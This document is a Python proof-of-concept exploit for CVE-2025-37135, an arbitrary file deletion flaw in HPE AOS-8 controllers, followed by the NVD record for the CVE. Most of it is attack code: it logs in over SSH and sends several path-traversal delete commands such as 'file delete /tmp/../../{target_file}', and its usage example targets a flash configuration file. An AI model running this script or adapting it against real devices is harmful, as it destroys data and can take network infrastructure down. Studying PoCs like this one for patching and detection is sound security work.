CVE-2025-37135

#!/usr/bin/env python3 """ CVE-2025-37135 - HPE AOS-8 Controller CLI Arbitrary File Deletion PoC This PoC demonstrates the arbitrary file deletion vulnerability in the command-line interface of AOS-8 Controller/Mobility Conductor. """ import paramiko import sys import time class AOS8Exploit: def __init__(self, host, port, username, password): self.host = host self.port = port self.username = username self.password = password self.client = None def connect(self): """Establish SSH connection to AOS-8 Controller CLI""" try: self.client = paramiko.SSHClient() self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) self.client.connect( hostname=self.host, port=self.port, username=self.username, password=self.password, look_for_keys=False, allow_agent=False, timeout=10 ) print(f"[+] Connected to {self.host}:{self.port}") return True except Exception as e: print(f"[-] Connection failed: {e}") return False def execute_cli_command(self, command): """Execute a command on the AOS-8 CLI""" try: shell = self.client.invoke_shell() time.sleep(2) # Wait for login prompt output = shell.recv(4096).decode('utf-8', errors='ignore') print(f"[*] Login prompt: {output.strip()}") # Send username shell.send(self.username + "\n") time.sleep(1) output = shell.recv(4096).decode('utf-8', errors='ignore') # Send password shell.send(self.password + "\n") time.sleep(2) output = shell.recv(4096).decode('utf-8', errors='ignore') print(f"[+] Authenticated: {output.strip()}") # Enter enable mode if needed shell.send("enable\n") time.sleep(1) output = shell.recv(4096).decode('utf-8', errors='ignore') # Execute the malicious command with path traversal print(f"[*] Executing: {command}") shell.send(command + "\n") time.sleep(2) output = shell.recv(4096).decode('utf-8', errors='ignore') print(f"[+] Command output: {output.strip()}") shell.close() return output except Exception as e: print(f"[-] Command execution failed: {e}") return None def exploit_path_traversal(self, target_file): """ Exploit path traversal in CLI to delete arbitrary files. Uses ../ sequences to escape the intended directory boundary. """ # Example malicious CLI commands exploiting path traversal commands = [ f"file delete /tmp/../../{target_file}", f"delete /flash/../../{target_file}", f"file remove ../{target_file}", f"clear-file ../../{target_file}" ] for cmd in commands: print(f"\n[*] Trying command: {cmd}") result = self.execute_cli_command(cmd) if result and "error" not in result.lower(): print(f"[+] Potential success with: {cmd}") return True return False def disconnect(self): """Close the SSH connection""" if self.client: self.client.close() print("[*] Connection closed") def main(): if len(sys.argv) != 6: print(f"Usage: {sys.argv[0]} <host> <port> <username> <password> <target_file>") print(f"Example: {sys.argv[0]} 192.168.1.1 22 admin password123 /flash/config.cfg") sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) username = sys.argv[3] password = sys.argv[4] target_file = sys.argv[5] print("=" * 60) print("CVE-2025-37135 - AOS-8 CLI Arbitrary File Deletion PoC") print("=" * 60) exploit = AOS8Exploit(host, port, username, password) if exploit.connect(): exploit.exploit_path_traversal(target_file) exploit.disconnect() print("\n[*] PoC execution completed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-37135", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:40.140", "lastModified": "2025-11-12T21:12:21.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arbitrary file deletion vulnerabilities have been identified in the command-line interface of an AOS-8 Controller/Mobility Conductor. Successful exploitation of these vulnerabilities could allow an authenticated remote malicious actor to delete arbitrary files within the affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}